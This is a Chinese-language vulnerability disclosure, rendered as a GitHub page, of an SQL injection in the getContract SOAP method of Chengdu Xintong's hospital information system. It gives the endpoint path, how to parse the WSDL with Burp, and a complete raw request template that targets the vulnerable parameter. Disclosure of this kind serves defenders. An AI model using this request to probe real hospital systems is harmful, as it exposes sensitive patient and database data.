Skip to content

Latest commit

 

History

History
63 lines (46 loc) · 2.76 KB

成都信通网易医疗科技发展有限公司HIS系统getContract存在SQL注入漏洞.md

File metadata and controls

63 lines (46 loc) · 2.76 KB

成都信通网易医疗科技发展有限公司HIS系统getContract存在SQL注入漏洞

一、漏洞简介

成都信通网易医疗科技发展有限公司总部位于四川成都高新区天府软件园,在国内医疗软件行业中率先采用Java技术,融入国际国内标准,整体设计,持续研发,先后形成了“智慧云医院信息平台”、“医共体信息平台”、“互联网医院平台”、“医养融合信息平台”等新一代一系列自主知识产权产品,全面覆盖了单体医院业务、区域医疗、医共体、“互联网+健康”等信息化建设领域。成都信通网易医疗科技发展有限公司HIS系统getContract存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。

二、影响版本

  • 成都信通网易医疗科技发展有限公司HIS系统(基于电子病历的医院信息化平台)

三、特征

1700650007533-e9496b7e-969f-4370-b652-44a251239e7b.png

四、漏洞复现

  1. 漏洞位置

在下列nzzManager接口下的getContract参数

/xtHisService/services

1700650622367-8e26144c-93e3-4609-8b3c-3d4d0c6aefbf.png

  1. 使用burp抓包,使用wsdl插件解析
/xtHisService/services/nzzManager?wsdl

wsdler.jar1700650603699-766cdcf1-430c-4376-a4a0-6ef8acf31042.png

  1. 数据包
POST /xtHisService/services/nzzManager HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=0A4C07C0C8A7CFF9A03AD7B586FFCBBE
Upgrade-Insecure-Requests: 1
SOAPAction: 
Content-Type: text/xml;charset=UTF-8
Host: xx.xx.xx.xx
Content-Length: 314

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:imp="http://imp.nzz.ws.manager.cdxt.com/">
   <soapenv:Header/>
   <soapenv:Body>
      <imp:getContract>
         <!--type: string-->
         <arg0>gero et</arg0>
      </imp:getContract>
   </soapenv:Body>
</soapenv:Envelope>

1700650531584-d9202bd2-3b4c-4680-8f6f-540bbd12bd17.png

更新: 2024-02-29 23:55:28
原文: https://www.yuque.com/xiaokp7/ocvun2/tn4e1b9rtiep13x8